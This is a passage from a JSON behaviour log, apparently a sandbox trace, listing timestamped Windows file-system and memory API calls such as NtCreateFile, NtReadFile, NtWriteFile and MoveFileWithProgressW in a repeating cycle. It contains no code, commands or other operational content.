17:41:57,755", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,755", "api": 
"MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,755", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,755", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,755", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,755", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,755", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,765", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,765", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,765", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,765", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,765", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,765", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,765", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,765", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,765", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,765", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,775", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,775", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,775", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,775", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,775", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,775", "api": "NtSetInformationFile"}, 
{"category": "process", "timestamp": "2016-02-16 17:41:57,775", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,775", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,775", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,785", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,785", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,785", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,785", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,785", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,785", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,785", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,785", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,785", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,795", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,795", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,795", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,795", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,795", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,795", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,795", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,795", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,795", "api": "NtSetInformationFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:57,795", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,795", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,795", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,795", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,795", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,805", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,805", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,805", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,805", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,805", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,805", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,805", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,805", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,805", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,815", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,815", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,815", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,815", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,815", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,815", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,815", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:57,815", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,815", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,815", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,815", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,825", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,825", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,825", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,825", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,825", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,825", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,825", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,825", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,825", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,825", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,825", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,825", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,835", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,835", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,835", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,835", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,835", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:57,835", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,835", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,835", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,835", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,845", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,845", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,845", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,845", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,845", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,845", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,845", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,845", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,845", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,845", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,845", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,845", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,845", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,845", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,845", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,855", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,855", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,855", 
"api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,855", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,855", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,855", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,855", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,855", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,855", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,865", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,865", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,865", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,865", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,865", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,865", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,865", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,865", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,875", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,875", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,875", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,875", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,875", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,875", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,875", "api": 
"NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,875", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,875", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,875", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,875", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,885", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,885", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,885", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,885", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,885", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,885", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,885", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,885", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,885", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,885", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,885", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,885", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,895", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,895", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,895", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,895", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,895", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:57,895", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,895", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,895", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,895", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,905", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,905", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,905", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,905", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,905", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,905", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,905", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,905", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,915", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,915", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,915", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,915", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,915", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,915", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,915", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,915", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,915", "api": "NtReadFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:57,915", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,915", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,915", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,925", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,925", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,925", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,925", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,925", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,925", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,925", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,925", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,925", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,925", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,925", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,925", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,935", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,935", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,935", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,935", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,935", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,935", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:57,935", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,935", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,945", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,945", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,945", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,945", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,945", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,945", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,945", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,945", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,945", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,945", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,945", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,955", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,955", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,955", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,955", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,955", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,955", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,955", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,955", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:57,955", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,955", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,965", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,965", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,965", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,965", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,965", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,965", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,965", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,965", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,965", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,965", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,965", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,976", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,976", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,976", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,976", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,976", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,976", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,976", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,976", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,986", 
"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,986", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,986", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,986", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,986", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,986", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,986", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,986", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,986", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,986", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,996", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,996", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,996", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,996", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,996", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,996", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:57,996", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,996", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,996", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:57,996", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,006", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,006", "api": "MoveFileWithProgressW"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:58,006", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,006", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,006", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,006", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,006", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,006", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,006", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,016", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,016", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,016", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,016", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,016", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,016", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,026", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,026", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,026", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,026", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,026", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,026", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,036", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,036", "api": "NtSetInformationFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:58,036", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,036", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,036", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,036", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,036", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,036", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,046", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,046", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,046", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,046", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,046", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,046", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,046", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,046", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,046", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,046", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,046", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,056", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,056", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,056", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,056", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:58,056", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,056", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,056", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,056", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,066", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,066", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,066", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,066", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,066", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:58,066", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,066", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,066", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,066", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,066", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,066", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,076", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,076", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,076", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,076", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:58,076", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": 